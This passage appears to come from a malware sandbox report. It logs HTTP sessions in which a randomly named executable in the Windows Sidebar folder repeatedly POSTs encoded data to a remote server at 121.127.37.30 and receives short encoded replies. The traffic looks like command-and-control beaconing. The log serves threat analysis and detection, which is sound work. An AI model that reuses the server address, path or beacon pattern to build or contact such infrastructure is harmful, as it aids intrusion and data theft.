                                                Dec 5, 2024 16:02:22.077785015 CET446OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 384
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:22.424623013 CET384OUTData Raw: 55 51 5f 59 5b 5a 54 58 5e 5e 51 57 50 5f 5a 50 59 54 58 40 5b 50 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UQ_Y[ZTX^^QWP_ZPYTX@[PRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9*$<."$+)+/>6'*:("?7>2+[(+'$[5S<?!Y""Z)1
                                                Dec 5, 2024 16:02:22.513395071 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:22.893800020 CET324INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:22 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 23 06 37 04 31 07 20 39 34 0d 39 2d 2c 1e 27 30 32 08 27 20 30 5b 31 5b 3d 12 32 3b 2b 16 21 3b 3b 17 36 3a 2b 15 34 2c 34 05 24 27 28 46 0c 1d 22 5f 25 3b 3d 12 2a 17 01 0e 2f 2c 3e 1b 2a 33 26 58 2e 3d 29 09 3e 1d 21 57 3e 29 03 0e 25 2b 37 03 27 04 32 16 3f 33 34 01 30 0f 20 53 00 14 26 0a 2a 0f 3a 0c 3d 01 0f 5b 35 02 2f 09 3f 5d 22 5e 24 2b 22 56 26 37 3f 5f 31 5f 38 54 20 09 3f 1d 2a 58 39 04 27 3f 38 5b 3d 33 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: #71 949-,'02' 0[1[=2;+!;;6:+4,4$'(F"_%;=*/,>*3&X.=)>!W>)%+7'2?340 S&*:=[5/?]"^$+"V&7?_1_8T ?*X9'?8[=3&\! W=YV
                                                Dec 5, 2024 16:02:22.913639069 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:23.269150972 CET1452OUTData Raw: 50 52 5f 5b 5b 58 54 5c 5e 5e 51 57 50 5e 5a 5f 59 5c 58 41 5b 55 52 5d 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PR_[[XT\^^QWP^Z_Y\XA[UR][\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9+?',!V#7]>;<5]>*("<$("7X(;3>&(!Y""Z)5
                                                Dec 5, 2024 16:02:23.344397068 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:23.876399040 CET324INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:23 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 13 22 3d 00 58 20 3a 2f 57 2e 2d 38 11 24 30 0c 07 32 33 24 58 32 2e 3e 0d 32 28 27 18 22 5d 34 03 36 29 27 5e 21 2c 2b 10 26 27 28 46 0c 1d 21 02 24 5e 39 51 2b 29 30 1d 2f 2c 39 47 3d 23 3a 58 2d 3d 3d 08 2a 30 26 0e 3c 00 26 1d 25 28 02 1d 30 14 2d 02 3c 30 38 07 24 25 20 53 00 14 25 50 3d 0f 3a 0a 28 3c 29 59 35 2c 27 0e 29 2b 07 02 25 15 26 57 25 27 2f 15 31 39 34 55 37 0e 2b 57 3e 2e 2e 5b 32 2c 06 12 28 33 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: "=X :/W.-8$023$X2.>2('"]46)'^!,+&'(F!$^9Q+)0/,9G=#:X-==*0&<&%(0-<08$% S%P=:(<)Y5,')+%&W%'/194U7+W>..[2,(3&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.749731121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:22.281012058 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:22.627818108 CET2564OUTData Raw: 50 50 5f 5c 5b 5f 51 5d 5e 5e 51 57 50 5c 5a 5a 59 50 58 49 5b 55 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PP_\[_Q]^^QWP\ZZYPXI[URQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:>/6$1 Q?=$?5+*'X!/,)W +(0>+/!Y""Z)=
                                                Dec 5, 2024 16:02:23.601726055 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:23.840504885 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:23 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.749734121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:24.101886988 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2560
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:24.455926895 CET2560OUTData Raw: 50 57 5f 5b 5b 5b 51 5f 5e 5e 51 57 50 5a 5a 5c 59 50 58 49 5b 51 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PW_[[[Q_^^QWPZZ\YPXI[QR[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9\>/>0?-P#=;<?%4\)#5<>#X+$_0>>+!Y""Z)1
                                                Dec 5, 2024 16:02:25.427012920 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:25.838675976 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:25 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.749740121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:26.093826056 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:26.440274954 CET2564OUTData Raw: 50 55 5f 5c 5e 5b 54 5d 5e 5e 51 57 50 52 5a 59 59 50 58 49 5b 51 52 5e 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PU_\^[T]^^QWPRZYYPXI[QR^[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9+/6_'/*"$ \='?]*)86;*7+(;'!U?/!Y""Z)
                                                Dec 5, 2024 16:02:27.412092924 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:27.648539066 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:27 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.749746121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:27.959677935 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:28.315253973 CET2564OUTData Raw: 50 51 5f 5e 5e 59 51 58 5e 5e 51 57 50 5e 5a 50 59 50 58 41 5b 54 52 58 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PQ_^^YQX^^QWP^ZPYPXA[TRX[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9)%0?1U"7;=8<+&(>36')W0+;8]&-!U*/!Y""Z)5


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.749752121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:28.999576092 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:29.346502066 CET1452OUTData Raw: 55 53 5a 58 5e 58 54 5d 5e 5e 51 57 50 5e 5a 59 59 52 58 49 5b 5e 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: USZX^XT]^^QWP^ZYYRXI[^RY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:*?Y$,247;=]+6+= 6<?=23+(30+/!Y""Z)5
                                                Dec 5, 2024 16:02:30.325002909 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:30.561918020 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:30 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 13 20 2d 0b 01 20 2a 27 53 2e 58 30 11 30 23 26 43 26 33 02 5a 31 5b 3d 57 27 2b 01 52 21 3b 37 18 35 3a 20 04 23 11 34 02 26 37 28 46 0c 1d 21 07 33 06 3a 0e 29 5f 2c 55 2c 2c 25 08 2a 20 29 02 2c 2e 0b 0d 29 55 29 1e 2b 39 07 09 25 28 02 59 33 29 32 16 2b 1d 01 11 30 1f 20 53 00 14 26 0a 3e 21 25 54 3e 59 3e 02 35 05 3c 50 2b 3b 0f 01 32 05 21 08 31 24 2f 5c 25 39 28 52 20 37 2b 57 2a 3e 0c 5a 25 2c 0e 5d 2a 33 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: - *'S.X00#&C&3Z1[=W'+R!;75: #4&7(F!3:)_,U,,%* ),.)U)+9%(Y3)2+0 S&>!%T>Y>5<P+;2!1$/\%9(R 7+W*>Z%,]*3&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.749753121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:29.139359951 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:29.487243891 CET2564OUTData Raw: 55 53 5a 52 5b 58 54 52 5e 5e 51 57 50 5c 5a 5b 59 52 58 42 5b 5f 52 58 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: USZR[XTR^^QWP\Z[YRXB[_RX[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9),.'#$\>8X+%>;! (!<<;,\$-=V+/!Y""Z)=
                                                Dec 5, 2024 16:02:30.465775967 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:30.700455904 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:30 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.749759121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:30.951083899 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:31.299603939 CET2564OUTData Raw: 55 55 5a 53 5e 5d 54 53 5e 5e 51 57 50 5e 5a 5e 59 53 58 48 5b 54 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UUZS^]TS^^QWP^Z^YSXH[TRY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:*2\$/ (^)?)*45;R(!?<8$Y'."?/!Y""Z)5
                                                Dec 5, 2024 16:02:32.275085926 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:32.513256073 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:32 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.749760121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:32.760554075 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:33.112164974 CET2564OUTData Raw: 55 55 5a 5a 5e 58 54 5c 5e 5e 51 57 50 5d 5a 5d 59 54 58 47 5b 50 52 5e 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UUZZ^XT\^^QWP]Z]YTXG[PR^[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9X*,.'?* 4X)8Y?&?=_ !/,*0< 01U*/!Y""Z)
                                                Dec 5, 2024 16:02:34.085803032 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:34.320471048 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:33 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.749766121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:34.559473038 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:34.909106016 CET2564OUTData Raw: 55 53 5f 5c 5e 5e 54 5d 5e 5e 51 57 50 5d 5a 58 59 56 58 42 5b 56 52 5f 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: US_\^^T]^^QWP]ZXYVXB[VR_[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9_>>Y0?%#(=]#+5+*'6,=?X(8'1(!Y""Z)


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.749772121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:35.686146021 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1436
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:36.034172058 CET1436OUTData Raw: 55 53 5a 5a 5e 59 54 5e 5e 5e 51 57 50 5a 5a 5f 59 53 58 42 5b 53 52 5d 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: USZZ^YT^^^QWPZZ_YSXB[SR][\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9_>?2\3/W#4+=]/<'=9^ /7(24(8Y3-=?/!Y""Z)=
                                                Dec 5, 2024 16:02:37.014811993 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:37.248414993 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:36 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 23 01 20 2d 04 59 34 5c 28 0a 2c 2e 28 10 24 20 2d 18 32 30 33 04 31 03 29 12 27 3b 2f 51 21 05 0e 05 35 07 05 58 23 59 34 03 26 37 28 46 0c 1d 22 58 33 3b 31 57 2a 39 24 51 2c 2f 3a 1b 29 1d 0c 13 2e 3d 31 08 3d 0a 21 1e 3c 17 2a 50 25 5e 30 5f 30 5c 31 06 2b 23 05 1c 33 35 20 53 00 14 26 09 2b 31 17 53 28 2c 3e 04 22 12 28 1f 28 38 22 5b 24 2b 25 0f 26 27 3b 5f 25 00 23 0d 34 0e 2f 12 29 3d 25 04 26 12 09 04 2a 19 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: # -Y4\(,.($ -2031)';/Q!5X#Y4&7(F"X3;1W*9$Q,/:).=1=!<*P%^0_0\1+#35 S&+1S(,>"((8"[$+%&';_%#4/)=%&*&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.749773121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:35.808840036 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
